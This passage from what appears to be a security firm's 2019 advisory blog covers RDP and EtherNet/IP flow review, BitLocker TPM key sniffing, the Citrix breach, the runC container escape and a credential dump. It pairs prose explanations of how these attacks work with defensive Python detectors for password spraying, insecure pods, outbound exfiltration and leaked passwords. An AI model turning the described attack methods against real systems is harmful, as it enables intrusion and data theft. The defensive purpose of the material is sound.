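# Ports named in the briefing: 3389 is RDP (BlueKeep), 2222 and 44818 are
# EtherNet/IP, the CIP transport the PowerFlex drives speak.
SENSITIVE_PORTS = {3389: "rdp", 2222: "enip", 44818: "enip"}

# Constructed policy: the only sources that should ever reach each service.
APPROVED_SOURCES = {
    "rdp": ["10.0.9.5/32"],       # the sanctioned vulnerability scanner
    "enip": ["10.50.0.0/24"],     # engineering workstation subnet
}

# Constructed flow records: (source, destination, protocol, destination port)
FLOWS = [
    ("10.0.9.5", "10.0.1.20", "tcp", 3389),    # scanner probing RDP: expected
    ("192.0.2.44", "10.0.1.20", "tcp", 3389),  # unknown source hitting RDP
    ("192.0.2.44", "10.0.1.21", "tcp", 3389),  # ...and a second RDP host
    ("10.50.0.12", "10.60.0.7", "tcp", 44818), # engineering host to drive: expected
    ("10.0.1.33", "10.60.0.7", "udp", 2222),   # office host reaching the drive
    ("10.0.1.33", "10.0.1.20", "tcp", 443),    # not a port this review covers
]


def compile_policy(approved):
    """service -> list of ip_network objects."""
    return {svc: [ipaddress.ip_network(c) for c in cidrs] for svc, cidrs in approved.items()}


def review_flows(flows, approved=APPROVED_SOURCES, ports=SENSITIVE_PORTS):
    """Return one finding per flow to a sensitive port from an unapproved source.

    Whether the traffic is a scan or an exploit attempt cannot be told from the
    flow alone; the source not being a sanctioned scanner or engineering host
    is what makes it hostile or compromised until proven otherwise.
    """
    nets = compile_policy(approved)
    findings = []
    for src, dst, proto, dport in flows:
        service = ports.get(dport)
        if service is None:
            continue
        ip = ipaddress.ip_address(src)
        if any(ip in net for net in nets.get(service, [])):
            continue
        findings.append({"src": src, "dst": dst, "proto": proto, "port": dport,
                         "service": service, "verdict": "unapproved_source"})
    return findings


def targets_by_source(findings):
    """source -> sorted distinct destinations, to see which sources are sweeping."""
    seen = defaultdict(set)
    for f in findings:
        seen[f["src"]].add(f["dst"])
    return {src: sorted(dsts) for src, dsts in seen.items()}


if __name__ == "__main__":
    hits = review_flows(FLOWS)
    for f in hits:
        print(f"ALERT {f['service']} {f['proto']}/{f['port']} from {f['src']} to {f['dst']}")
    print(targets_by_source(hits))
```

The same table that drives the review is the one a firewall rule set should enforce: every finding is a flow that should not have been possible if the source restriction recommended above were in place, so a non-empty result is evidence that either the policy or the enforcement is incomplete.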

Additional Resources

Rockwell Product Page


InGuardians Events & Resources
Upcoming Webinars

“SCANNERS, TUNNELS, AND SIMS, OH MY!” with Justin Searle, Director of ICS Security
April 18, 12 PM PDT / 3 PM EDT

Learn more about the Control Things Tools project and the Python library that provides the command-line and graphical interfaces for these tools.
Register here:

“RED TEAM PRIMER FOR EXECUTIVES” with InGuardians Offensive Security Team
May 30, 12 PM PDT / 3 PM EDT

Join us for a primer on Red Team Penetration Testing.  InGuardians Offensive Services Team will discuss what is a red team pentest, what clients should be considering when preparing one, and what to expect to learn from the results.

Register here:

For all upcoming webinars, please visit:

Upcoming Classes

Instructor: Justin Searle, Director of ICS Security, InGuardians, SANS Certified Instructor

SANS Orlando | Apr 1 – Apr 5 2019

SANS Security West | San Diego | May 9 – May 13 2019

Instructor: Larry Pesce, Director of Research, InGuardians, SANS Certified Instructor

Amsterdam, Netherlands | May 20 – May 25, 2019

Instructor: David Mayer, Senior Security Consultant

Boca Raton, FL | Thu May 9 – Fri May 24, 2019

For all upcoming training and events, please visit:

3/26/19 Bitlocker Keys Recoverable, Allowing Bad Actors to Unlock Encrypted Disks
Earlier in March, researchers from Pulse Security released their analysis and research on recovering Bitlocker Full Disk Encryption (FDE) master keys from an associated v1.2 or v2.0 Trusted Platform Module (TPM) by sniffing the key exchange on the bus with inexpensive hardware. The recovered master key was then used to decrypt the drive, recovering all of the data.


Given tools, time and knowledge of this technique, an attacker with physical access can decrypt a Bitlocker full disk-encrypted computer.

Many organizations rely on Microsoft Bitlocker as a solution for built-in, low cost, easily managed FDE, leveraging the previous investments in Microsoft products.  While InGuardians recommends FDE as a matter of course, these new attacks against default installations of Bitlocker have raised questions about its overall effectiveness.

While this attack is particularly intricate in its implementation, requiring some special skills, hardware and analytic techniques, all are well within the capability of even a moderately determined attacker. This is compounded by readily available inexpensive hardware and open source tools. Some points to note on this attack: the device must be in the possession of the attacker in order to capture the communication on the bus between the TPM and the drive; also, unlike “evil maid” attacks, this attack does require significant time and setup to perform.

Ultimately, should an organization lose a device encrypted with BitLocker in the default configuration, it should no longer consider the data it contains secure, and should consider the breach notification requirements for its jurisdiction.

This specific attack is aimed at BitLocker, but it demonstrates that key release and key storage are critical elements of any security implementation. Every FDE system needs to be implemented properly, and, like any technology involving cryptography, that implementation can be difficult.

In its default state, BitLocker can be compromised through this attack. However, with additional controls in the boot process and BitLocker configuration, the attack can be effectively mitigated. These controls take the form of pairing the TPM with a pre-boot PIN entered by the user at boot time, or with a startup key held on removable media (BitLocker’s TPM+PIN and TPM+startup key protectors, enforced through the “Require additional authentication at startup” Group Policy setting for operating system drives). In both cases a second factor has been added to the boot process: the TPM will not release the key onto the bus until the PIN or startup key is presented, so an attacker who holds only the stolen device has nothing to sniff. Mitigating this attack does require user intervention at boot time, which may be perceived as a hindrance to workflow.

Additional Resources


Microsoft – BitLocker Countermeasures

InGuardians Events & Resources

Upcoming Webinars:

“Hacking and Hardening Kubernetes” with Jay Beale, CTO at InGuardians
Thursday, March 28 at 12 PM PDT / 3 PM EDT
Understand how to attack and defend Kubernetes and other container orchestration platforms.

“Scanners, Tunnels, and Sims, Oh My!” with Justin Searle, Director of ICS Security
April 18 at 12 PM PDT / 3 PM EDT
Learn more about the Control Things Tools project and the Python library that provides the command-line and graphical interfaces for these tools.

Upcoming Classes

Instructor: Justin Searle, Director of ICS Security, InGuardians, SANS Certified Instructor
SANS Orlando | Apr 1 – Apr 5 2019

Instructor: Larry Pesce, Director of Research, InGuardians, SANS Certified Instructor
SANS Security West | San Diego | May 9 – May 13 2019
Amsterdam, Netherlands | May 20 – May 25, 2019

Instructor: David Mayer, Senior Security Consultant
Boca Raton, FL | Thu May 9 – Fri May 24, 2019

3/13/19 Citrix Breached: Over Six Terabytes of Data Stolen, Impact to Clients Unknown
On March 8th, Citrix announced that it had been breached and that over six (6) terabytes of sensitive data had been stolen. The attack is currently being attributed to the Iranian-backed Iridium group. The files were exfiltrated from the network after the malicious actors bypassed multi-factor authentication and connected to Citrix VPNs. The attackers stole e-mail correspondence, files left on network shares, and data pertaining to project management and procurement. The FBI believes that the attackers gained access to Citrix networks by password spraying (trying a few weak, common passwords against many externally facing accounts), and Citrix does not yet know how long the attackers were on the network before they were detected.

While the breach’s impact is still being evaluated, Citrix customers should monitor their own accounts and credentials closely for signs that they were stolen along with the internal documents.

Given the sheer volume of data stolen, InGuardians recommends changing all passwords for accounts related to Citrix. InGuardians also recommends that organizations review their password policies and ensure strong passwords are in use, so that spraying of common passwords cannot give attackers a foothold on your network. Multi-factor authentication is also critical, but it does not make strong password policies irrelevant.
If you suspect that your organization has been affected by the breach, begin incident response triage and initiate a threat hunting operation.
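As an added illustration of the spraying pattern the recommendation above is meant to blunt, the following Python sketch, written for this briefing and not part of Citrix’s or the FBI’s disclosures, separates password spraying (one source, a few passwords, many accounts) from brute force (one source, many attempts, one account) in authentication logs and lists any account that the spraying source then logged into successfully. The log format, account names and addresses are constructed for the example; a real deployment would parse NetScaler, VPN or domain controller authentication events instead.

```python
"""Spot password spraying in authentication logs: a single source trying one
or two passwords against many accounts, as opposed to brute force, where one
account takes many attempts."""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Constructed sample log lines for this example (not real Citrix or Windows
# logs). Assumed format: ISO-8601 timestamp, result, user=..., src=...
SAMPLE_LOG = """\
2019-03-01T09:00:01Z FAIL user=alice src=203.0.113.7
2019-03-01T09:00:03Z FAIL user=bob src=203.0.113.7
2019-03-01T09:00:05Z FAIL user=carol src=203.0.113.7
2019-03-01T09:00:07Z FAIL user=dave src=203.0.113.7
2019-03-01T09:00:09Z FAIL user=erin src=203.0.113.7
2019-03-01T09:00:11Z OK user=frank src=203.0.113.7
2019-03-01T09:00:02Z FAIL user=mallory src=198.51.100.9
2019-03-01T09:00:04Z FAIL user=mallory src=198.51.100.9
2019-03-01T09:00:06Z FAIL user=mallory src=198.51.100.9
2019-03-01T09:00:08Z FAIL user=mallory src=198.51.100.9
2019-03-01T09:00:10Z FAIL user=mallory src=198.51.100.9
2019-03-01T09:00:12Z FAIL user=mallory src=198.51.100.9
2019-03-01T10:30:00Z FAIL user=alice src=192.0.2.44
"""

LINE = re.compile(r"^(\S+) (OK|FAIL) user=(\S+) src=(\S+)$")


def parse(log_text):
    """Return (timestamp, result, user, src) tuples; lines that do not match
    the assumed format are skipped rather than guessed at."""
    events = []
    for line in log_text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m.group(2), m.group(3), m.group(4)))
    return events


def detect_spraying(events, window=timedelta(minutes=10), min_users=5, max_per_user=2):
    """Flag a source that fails against at least `min_users` distinct accounts
    inside `window` with no more than `max_per_user` failures per account
    (spraying). A source hammering a single account beyond 2 * max_per_user
    failures in the window is reported as brute force instead. Any success
    from a flagged source is listed, since that is the account to reset first."""
    failures = defaultdict(list)
    successes = defaultdict(set)
    for ts, result, user, src in events:
        if result == "FAIL":
            failures[src].append((ts, user))
        else:
            successes[src].add(user)

    findings = []
    for src, fails in failures.items():
        fails.sort()
        for i, (start, _) in enumerate(fails):
            in_window = [u for t, u in fails[i:] if t - start <= window]
            users = set(in_window)
            kind = None
            if len(users) >= min_users and all(in_window.count(u) <= max_per_user for u in users):
                kind = "password_spray"
            elif len(users) == 1 and len(in_window) > 2 * max_per_user:
                kind = "brute_force"
            if kind:
                findings.append({"src": src, "kind": kind,
                                 "users": sorted(users),
                                 "succeeded": sorted(successes[src])})
                break  # one finding per source is enough to raise the alert
    return findings


if __name__ == "__main__":
    for finding in detect_spraying(parse(SAMPLE_LOG)):
        print(finding)
```

Per-account lockout thresholds never fire on the first source, which is exactly why spraying works; the detection has to key on the source (or on the password hash, where the IdP exposes it), not the account.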

Additional Resources
Iranian-backed hackers ransacked Citrix, swiped 6TB+ of emails, docs, secrets, claims cyber-biz (The Register)

“Citrix investigating unauthorized access to the internal network” (Citrix Blog: Stan Black)

“Iranian-backed hackers stole data from major U.S. government contractor” (NBC News)

InGuardians Events & Resources

LIVE WEBINAR Thursday, March 28 at 12 PM PDT / 3 PM EDT
“Hacking and Hardening Kubernetes” with Jay Beale, CTO at InGuardians

Justin Searle, InGuardians Director of ICS Security, will present “Scanners, Tunnels, and Sims, Oh My!” at the SANS ICS Summit | Mar 18-25 | Orlando, FL. Learn more about the Control Things Tools project and the Python library that provides the command-line and graphical interfaces for these tools.

LIVE WEBINAR on April 18 at 12 PM PDT / 3 PM EDT
“Scanners, Tunnels, and Sims, Oh My!” with Justin Searle, Director of ICS Security

3/7/19 Dow Jones’ watchlist of 2.4 million high-risk individuals has leaked
Dow Jones’ watchlist of politicians, high-risk individuals and corporate entities has been exposed after a company with access to the database left it on a server without a password.
This watchlist includes senior political figures (“politically exposed persons”), their relatives, close associates and companies to which they are linked. It also includes individuals and organizations who have been involved in financial crimes and individuals on terrorist watchlists. It includes not only names, but also Dow Jones’ internal profile notes and PII, including date of birth, place of citizenship and photographs. The watchlist, which leaked here as a file export, is sold as a product accessible via APIs.

It is important to note that Dow Jones was not hacked in this instance.  A client of theirs, with legitimate access to the data, failed to secure its access to the information. That “weakest link” exposed a large database of sensitive information and negated the security efforts of Dow Jones and every other client paying for access who properly secured their access to the watchlist.

The overall impact of this breach is unknown at this time, but if this information is used to target high-profile persons of interest it may lead to upstream liability for all companies involved. First, this should trigger an examination of data sharing agreements at Dow Jones and serve as a lesson for the rest of us. Next, we need to ask what other data on that server was compromised. What other servers of the Dow Jones client were compromised and what other information was lost? What is that company’s current security posture, and in what ways has that been assessed or verified?

The next step is to look at your own company’s data sharing or subscribing agreements. With what other organizations do you share data? What technical network, software, and procedural safeguards are in place? What contractual language is in place among business entities requiring information security practices? What assurances or auditing mechanisms are in place, both contractually AND in practice? When were such systems last checked? WHO has the report? How is that report guarded?

Answer the questions above, and the others that will come to mind in your own organization. If you are not the ‘go to’ person for any of those questions, get the question to the right place.

We recommend that organizations explicitly review contracts and consider legal issues, in addition to requiring a third-party security assessment and vendor security questionnaire, before data sharing agreements go into effect.

Your business should have a data classification process – what matters most, some, and least? Know what data is sensitive, how sensitive it is, and where that data is stored and shared. Do those access points have logs? In recent engagements, InGuardians has continued to find organizations that are not prepared to detect or log unauthorized access to sensitive systems and data. Review what you log, where logs are stored, log retention policy, and how they are analyzed. A log that is overwritten in 48 hours is unlikely to provide useful info in the event of unauthorized access or to track a compromise and breach.

Additional Resources
Dow Jones’ watchlist of 2.4 million high-risk individuals has leaked (TechCrunch) 

Politically Exposed Person (Wikipedia)

Dow Jones Risk Screening Watchlist Exposed (Security Discovery blog)

Cloud Leak: WSJ Parent Company Dow Jones Exposed Customer Data (UpGuard Blog)

A massive financial crime and terrorism database has leaked (ZDNet, 2016) 

InGuardians Events & Resources

LIVE WEBINAR Thursday, March 28 at 12 PM PDT / 3 PM EDT
“Hacking and Hardening Kubernetes” with Jay Beale, CTO at InGuardians

Justin Searle, InGuardians Director of ICS Security, will present “Scanners, Tunnels, and Sims, Oh My!” at the SANS ICS Summit | Mar 18-25 | Orlando, FL. Learn more about the Control Things Tools project and the Python library that provides the command-line and graphical interfaces for these tools.

LIVE WEBINAR on April 18 at 12 PM PDT / 3 PM EDT
“Scanners, Tunnels, and Sims, Oh My!” with Justin Searle, Director of ICS Security

2/21/19 Container Escape in runC-based technology including Docker and Kubernetes
Security researchers have disclosed a container escape (CVE-2019-5736) in runC, the low-level runtime behind Docker, Kubernetes, cri-o and containerd. A slight variant of the exploit code is reported to work on LXC and Apache Mesos. Hosted services built on these runtimes, including Amazon Elastic Container Service (ECS), Amazon Elastic Container Service for Kubernetes (EKS), AWS Fargate, Google Kubernetes Engine (GKE), DigitalOcean, OpenShift and others, were also affected and are in various states of patching.

In the case of this exploit, an attacker is able to escape from a container and gain full root access to the host. The attacker will then likely access other resources via network, storage and data stored on the host. Given this level of access, the attacker could rewrite any host-based firewall rules as necessary.

Multiple proof of concept (PoC) exploits exist for this vulnerability. One relies on a malicious container image deployed into the container infrastructure. When the runtime starts a container from that image, the image’s malicious entry point overwrites the host runC binary with minimal user interaction, ultimately granting root-level access to the host operating system. While deploying the malicious container may seem like a barrier to entry, it is often easily overcome: many administrators fail to set permissions properly, allowing users to deploy their own containers at will, or are willing to use the “first available” public image, which may already have been poisoned by an attacker.

Another exploit targets an already-running container, likely one whose application an attacker has compromised, or a fresh privileged container the attacker is able to start on the cluster. This variant requires that an administrator or infrastructure component “exec” a command into that container after the exploit has been staged. In any case, this vulnerability will be exploited.

Failure to resolve runC vulnerabilities can allow a malicious party to gain root level access to the underlying container host. This root level access grants full permissions to the host operating system, as well as the ability to interact with all of the containers running on the host. To compound the issue, once an attacker has root access to the one host, it can be used as a pivot point into the internal network, with the capability to compromise additional resources.

InGuardians recommendations have several components, depending on the platform that has been adopted:

All Platforms
◦    Examine runC-created container logs for anomalous activity
◦    Compare the running list of containers to your inventory

Internal cluster
◦    Update runC to the latest version for your supported platform. See the Additional Resources section for details. [1]

Hosted provider
◦    Amazon: Amazon has provided patches for Amazon Linux, ECS, EKS, and Fargate, many of which need administrator intervention to apply. See the Additional Resources section for details. [4]
◦    Google: Default GKE nodes running Container-Optimized OS have been patched, but Ubuntu nodes must be patched by the user. See the Additional Resources section for details. [3]
◦    DigitalOcean: In an email to customers, DigitalOcean has informed subscribers that it has patched runC.
◦    OpenShift and others: Contact your provider or review their vulnerability tracking information for the status of patches.

Other projects (Apache Mesos, LXC, etc.)
◦    Contact the project for the status of patches, as no public information had been posted at the time of this writing.

Overall recommendations
◦    Develop or amend a robust patching strategy that specifically addresses containerization infrastructure.
◦    Implement the Principle of Least Privilege for your container service of choice, preventing deployment of new containers except by select users with a business need to do so.
◦    Where the platform supports it, run containers as a non-root user, or with user namespaces so that root inside the container is not root (UID 0) on the host; the exploit needs root in the container to overwrite the host runC binary. [2]
◦    Develop and deploy a robust AppArmor or SELinux profile to detect and prevent runC overwrites.
◦    Use Pod Security Policies to enforce best practices, including requirements for unprivileged containers and AppArmor/SELinux/Seccomp profiles.
◦    Before deploying new containers, vet selected public images to ensure they do not contain additional, unwanted exploit code. Alternatively, do not rely on public container images; build them in house from known-good code and applications.
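To make the inventory and Pod Security Policy recommendations concrete, here is an added Python audit, example code written for this briefing rather than code from the runC or Kubernetes projects, that walks pod specs in the shape `kubectl get pods -o json` returns and reports each container that pulls an image outside a vetted, digest-pinned inventory, runs privileged or as root, allows privilege escalation, or lacks an AppArmor/seccomp profile. The registry name, image digests and pod specs are constructed for the example; the annotation keys are the ones Kubernetes used for AppArmor and seccomp at the time of the advisory.

```python
"""Audit running pod specs for the controls the runC advisory calls for:
images from a vetted inventory pinned by digest, no privileged containers,
no root, no privilege escalation, and an AppArmor or seccomp profile. This is
what a Pod Security Policy would enforce at admission; auditing what is
already running catches workloads deployed before the policy existed."""

# Constructed inventory for this example: images the team has vetted, pinned
# by digest so a re-pushed public tag cannot substitute a poisoned image.
APPROVED_IMAGES = {
    "registry.example.internal/web@sha256:" + "a" * 64,
    "registry.example.internal/worker@sha256:" + "b" * 64,
}

# Constructed pod specs shaped like `kubectl get pods -o json` items, trimmed
# to the fields the audit reads.
SAMPLE_PODS = [
    {
        "metadata": {
            "name": "web",
            "annotations": {"container.apparmor.security.beta.kubernetes.io/web": "runtime/default"},
        },
        "spec": {
            "securityContext": {"runAsUser": 1000, "runAsNonRoot": True},
            "containers": [{
                "name": "web",
                "image": "registry.example.internal/web@sha256:" + "a" * 64,
                "securityContext": {"allowPrivilegeEscalation": False},
            }],
        },
    },
    {
        "metadata": {"name": "debug"},
        "spec": {
            "containers": [{
                "name": "shell",
                "image": "docker.io/library/ubuntu:latest",
                "securityContext": {"privileged": True},
            }],
        },
    },
]

APPARMOR_PREFIX = "container.apparmor.security.beta.kubernetes.io/"
SECCOMP_POD_KEY = "seccomp.security.alpha.kubernetes.io/pod"


def audit_container(pod, container, approved):
    """Return the list of findings for one container in one pod."""
    findings = []
    image = container.get("image", "")
    if "@sha256:" not in image:
        findings.append("image not pinned by digest")
    if image not in approved:
        findings.append("image not in approved inventory")

    # Container-level securityContext overrides the pod-level one.
    sc = {**pod["spec"].get("securityContext", {}),
          **container.get("securityContext", {})}
    if sc.get("privileged"):
        findings.append("privileged container")
    if sc.get("runAsUser", 0) == 0 and not sc.get("runAsNonRoot"):
        findings.append("runs as root (UID 0)")
    if sc.get("allowPrivilegeEscalation", True):
        findings.append("allowPrivilegeEscalation not disabled")

    annotations = pod["metadata"].get("annotations", {})
    if (APPARMOR_PREFIX + container["name"]) not in annotations and SECCOMP_POD_KEY not in annotations:
        findings.append("no AppArmor or seccomp profile")
    return findings


def audit_pods(pods, approved=APPROVED_IMAGES):
    """Return (pod, container, finding) triples across all pods."""
    results = []
    for pod in pods:
        for container in pod["spec"].get("containers", []):
            for finding in audit_container(pod, container, approved):
                results.append((pod["metadata"]["name"], container["name"], finding))
    return results


if __name__ == "__main__":
    for pod, container, finding in audit_pods(SAMPLE_PODS):
        print(f"{pod}/{container}: {finding}")
```

Every finding on the `debug` pod is one the exploit depends on or is made easier by: an unvetted public tag that could be re-pushed, root inside the container, and no mandatory access control profile to stop the write to the host runC binary.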

Additional Resources
[1] CVE-2019-5736: runc container breakout (all versions)    

[2] Kubernetes Blog: Runc and CVE-2019-5736
[3] Google Cloud runC Security Bulletin
[4] AWS runC Security Bulletin
[5] ZDnet: Doomsday Docker security hole uncovered
[6] Nick Frichette’s Proof of Concept Exploit for CVE-2019-5736
[7] Exploit-DB Exploit 46369 for CVE-2019-5736

InGuardians Events & Resources
LIVE WEBINAR Thursday Feb 21 12PM PST | 3PM EST
Our Senior Security Consultant Adam Crompton @3nc0d3r is dropping a new set of tools for #RedTeam operations. Demo-heavy webinar… you don’t want to miss!

Adam will join our CTO Jay Beale on the RSA stage for “Hacking and Hardening Kubernetes”. This talk will demonstrate attacks on Kubernetes clusters, then demonstrate the defenses that defeat those attacks.

1/31/19 Managing security, risk, and insecurity
There have been several massive database breaches, application vulnerabilities, and many new exploits, and it’s only a month into the new year. Some of them are technical exploits and some have been procedural, like storing aggregate identity or authentication information.

System security is not the primary job for most organizations, but an aspect of providing some other goods or services. Core business functions need to be supported by your data systems; they need to work. They should also be efficiently controlled, which is why applications and programs are in place to enable effective management. However, no one can know the inner workings of all of your applications. What can a manager do to reduce risk and exposure? Here is a short list to help manage insecurity.


  • Inventory all of the operating systems and applications on the network.
    • If there are separate segments or networks, know which apps are where, especially on any external or internet facing networks.
    • Include which version or build numbers are installed, along with the latest patch number.
    • IT/Security should provide regular updates and know when new exploits impact installed apps.
  • Review and enforce identity/credential management policies.
    • Require multi-factor authentication.
    • Require aperiodic changes – not all at once, and not always on first of the month.
    • Use password management software.
  • Test vulnerability and patch management process
    • Know what public vulnerabilities and patches exist for each of your OSs & Apps.
    • Know what the patch testing and deployment process are.
    • Know how to determine which patches are critical.
  • Inventory and classify data
    • Identify sensitive and compartmentalized information
    • Require specific handling procedures with each level of information classification.
    • Clearly label data with its information classification
    • Securely store and compartmentalize sensitive and/or confidential information
  • Conduct system logging and log analysis.
    • Log critical and important events on sensitive systems and networks.
    • Sign and store logs for analysis and retention.
    • Histogram outgoing traffic – categorize known destinations, flag outliers.
    • Conduct log review and analysis of critical and important systems in order to identify areas of improvement in performance, availability, and security.
  • Maintain and analyze network and application controls
    • Tune firewalls/IPS/IDS to deter and detect exfiltration
    • Apply targeted rule sets tailored to the security level of each network segment
    • Analyze the security logs looking for performance hits, operational, business, and security-related events.
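As an added example of the outgoing-traffic histogram in the logging item above (written for this briefing, not part of the original list), the following Python code totals bytes per destination from flow records and flags destinations that are either uncategorized or move more than ten times the median destination volume. The flow records, addresses and allow-list are constructed; in practice they would come from a NetFlow/IPFIX collector or proxy logs.

```python
"""Histogram outbound traffic per destination and flag the outliers: a
destination nobody has vetted, or one receiving far more data than the
typical destination, both of which are worth a look as possible exfiltration."""
from collections import defaultdict
from statistics import median

# Constructed flow records for this example (source, destination, bytes out),
# in the shape of a summarised NetFlow/IPFIX export. Not real traffic.
FLOWS = [
    ("10.0.0.5", "203.0.113.10", 12_000),
    ("10.0.0.6", "203.0.113.10", 8_000),
    ("10.0.0.5", "203.0.113.11", 15_000),
    ("10.0.0.7", "203.0.113.12", 9_000),
    ("10.0.0.8", "203.0.113.13", 30_000),
    ("10.0.0.9", "203.0.113.14", 11_000),
    ("10.0.0.7", "198.51.100.77", 8_000_000),  # one host, one new destination, 8 MB
    ("10.0.0.6", "192.0.2.9", 4_000),          # new but small: review, not alarm
]

# Constructed allow-list of destinations the business has already categorised.
KNOWN_DESTINATIONS = {"203.0.113.10", "203.0.113.11", "203.0.113.12",
                      "203.0.113.13", "203.0.113.14"}


def histogram(flows):
    """Total bytes sent to each destination."""
    totals = defaultdict(int)
    for _, dst, nbytes in flows:
        totals[dst] += nbytes
    return dict(totals)


def flag_outliers(totals, known, factor=10):
    """Return (destination, bytes, reasons) for destinations that are unknown
    or exceed `factor` times the median destination volume, largest first.
    The median, not the mean, is the baseline so a single huge transfer
    cannot hide itself by dragging the average up."""
    baseline = median(totals.values())
    findings = []
    for dst, total in totals.items():
        reasons = []
        if dst not in known:
            reasons.append("unknown destination")
        if total > factor * baseline:
            reasons.append(f"{total} bytes, over {factor}x the median of {baseline:.0f}")
        if reasons:
            findings.append((dst, total, reasons))
    return sorted(findings, key=lambda f: -f[1])


if __name__ == "__main__":
    for dst, total, reasons in flag_outliers(histogram(FLOWS), KNOWN_DESTINATIONS):
        print(dst, total, "; ".join(reasons))
```

Run daily against the previous day’s flows, the output is short enough to be the “SHORT precis” a senior manager can ask for: what left the network, to where, and whether anyone has categorized the destination.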


Remember, because we do not and cannot know what the next exploit is in advance, we are really managing levels of insecurity. As I was writing this, two new issues popped up: Apple’s FaceTime can eavesdrop before you actually connect, and Google is apparently systematically broadcasting sensitive browsing and personal information to third party advertisers. One could be listening in on a board meeting, the other could be revealing someone’s searches for particular grades of aluminum or certain electronic chips. Both could be sources of business intelligence.

A senior manager should be able to ask to see the results of a log review and not have to wait for it to happen – someone should have one for that week or day and be able to give a SHORT precis.  Simply asking the question, and then watching averted eyes and feet shuffling, may tell you all you need to know.

Take that response and shape behaviors, not by barking, but by clearly laying out what’s needed to keep up with events.

Additional Resources

“Apple to fix FaceTime bug that allows eavesdropping” – Washington Post

Google and IAB ad category lists show ‘massive leakage of highly intimate data,’ GDPR complaint claims

Data management giant Rubrik leaked a massive database of client data

InGuardians Events & Resources

Our next webinar, “All of Your Copy/Paste Belongs to US”, goes live in February. Stay tuned for dates and registration links by following @InGuardians on Twitter.

Black Hat USA 2019 registration is open for “Attacking and Defending Linux, Docker and Kubernetes”.

Justin Searle, our Director of ICS Security, is teaching “Assessing and Exploiting Control Systems & IIoT”.

1/23/19 Over 1TB of Stolen Account Usernames and Passwords Made Available Publicly Last Week
A collection of over one terabyte of user data with names and passwords has been released. The passwords are allegedly from more than 2,000 compromised sites, though some or many of the site compromises may have occurred more than a year ago. As such, the collected passwords may not be current for the sites from which they were stolen. Given many people’s re-use of passwords, however, those passwords may be useful on entirely different sites.

Said to be a portion of a larger collection, this data dump has been referred to as “Collection #1”. It comprises nearly 2.7 billion records and 773 million unique email addresses. Unfortunately, this represents only a small portion of the full collection currently being distributed on many dark web and hacking forums. The full collection, “Collection #1-5 and Latest Anti-Public & Zabagur #1,” is a cloud-stored repository that contains over 1TB of data and is being sold on hacker forums.

The real problem and question is, “where did this dump come from, and which companies were affected and are unaware?” Troy Hunt, the security researcher behind HaveIBeenPwned and the Pwned Passwords checking service, released a post documenting his analysis and ingestion of the email addresses and passwords he obtained from “Collection #1.” Users of his service, and of vendors such as 1Password, whose Watchtower feature checks against these lists, are alerted to compromised accounts and credentials.

Mr. Hunt stated that this ingestion represented 140 million new email addresses that haveibeenpwned had not yet seen and therefore were not part of other publicly-released data breaches. These credentials are typically used by attackers to obtain access to services or applications. Attackers use the credentials from this type of data breach, testing them against many different websites, gaining access on a portion of those sites. This type of attack is commonly called “credential stuffing”, and presents a risk that many users do not often consider.

If your users are still using any of the passwords contained in this collection, attackers may use those same passwords, gaining access to both company and personal resources, such as e-mail, banking, document storage, and remote access.  The greatest impact stems from the difficulty that people have in managing large numbers of unique passwords. Many will use the same or similar passwords on multiple sites/services. Attackers will use variations of these passwords, including, but not limited to, incrementing numbers, years, or mixing in character/digit replacements.


  • Ensure all employees use multi-factor authentication for all company resources.
  • Check whether both company and personal email addresses appear in the public breach information, including HaveIBeenPwned.
  • Use a password manager, or a mass password-changing service, to generate unique passwords and change all your current passwords to newer, stronger and differing passwords.
  • Never use the same password on multiple sites.
  • Never use common or easily guessable patterns for passwords (season-year, incrementing, etc.).
  • Enable two-factor authentication, such as TOTP or third-party services like those available from Duo, for all services that support it and contain any sensitive or personal information.
  • Sign up for monitoring services that watch for this type of information, or use a tool such as Watchtower, integrated into 1Password’s password manager, to watch for compromised accounts.
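The following Python code is an added example for this briefing, not Troy Hunt’s or 1Password’s code, of two of the checks recommended above: a k-anonymity lookup in the style of the Pwned Passwords range API (only a 5-character SHA-1 prefix leaves the client), simulated offline against a constructed corpus, and a test for the season-year pattern and for trivial variants of a leaked password (trailing digits bumped, year rolled forward, leetspeak substitutions), which is what attackers try after the verbatim credential fails. The corpus and hit counts are made up; the real service would be queried over HTTPS by prefix.

```python
"""Offline checks for passwords against a breach corpus and the patterns
credential-stuffing attackers try first: the exact leaked password, a
season-year password, or a trivial variant (trailing digits bumped, year
rolled forward, a few leetspeak substitutions) of a leaked one."""
import hashlib
import re

# Constructed stand-in for a breach corpus such as Collection #1. Not real
# breach data.
LEAKED_PASSWORDS = {"Summer2018", "Password1", "qwerty123", "Welcome1"}

SEASON_YEAR = re.compile(r"^(spring|summer|autumn|fall|winter)[-_.]?(19|20)\d{2}[!@#$%]*$", re.I)
TRAILING_DIGITS = re.compile(r"\d+[!@#$%]*$")
LEET = str.maketrans({"@": "a", "$": "s", "0": "o", "1": "i", "3": "e"})


def sha1_hex(password):
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def build_ranges(corpus):
    """Simulate the Pwned Passwords range service offline: map each 5-hex-char
    SHA-1 prefix to 'SUFFIX:COUNT' lines, the format the real range endpoint
    returns. Counts here are made up for the example."""
    ranges = {}
    for pw in corpus:
        digest = sha1_hex(pw)
        ranges.setdefault(digest[:5], []).append(f"{digest[5:]}:{len(pw) * 1000}")
    return {prefix: "\r\n".join(lines) for prefix, lines in ranges.items()}


def pwned_count(password, range_lookup):
    """k-anonymity check: only the first five hex characters of the hash are
    sent to `range_lookup`; the suffix comparison happens locally."""
    digest = sha1_hex(password)
    prefix, suffix = digest[:5], digest[5:]
    for line in range_lookup(prefix).splitlines():
        candidate, _, count = line.strip().partition(":")
        if candidate == suffix:
            return int(count)
    return 0


def base_form(password):
    """Strip the decorations people add when forced to rotate a password:
    trailing digits, years, punctuation, and common character substitutions."""
    return TRAILING_DIGITS.sub("", password).translate(LEET).lower()


def audit_password(password, corpus, range_lookup):
    """Return the reasons a password should be rejected, or an empty list."""
    reasons = []
    if pwned_count(password, range_lookup) > 0:
        reasons.append("appears verbatim in breach corpus")
    if SEASON_YEAR.match(password):
        reasons.append("season-year pattern")
    leaked_bases = {base_form(p) for p in corpus}
    if password not in corpus and base_form(password) in leaked_bases:
        reasons.append("trivial variant of a leaked password")
    return reasons


if __name__ == "__main__":
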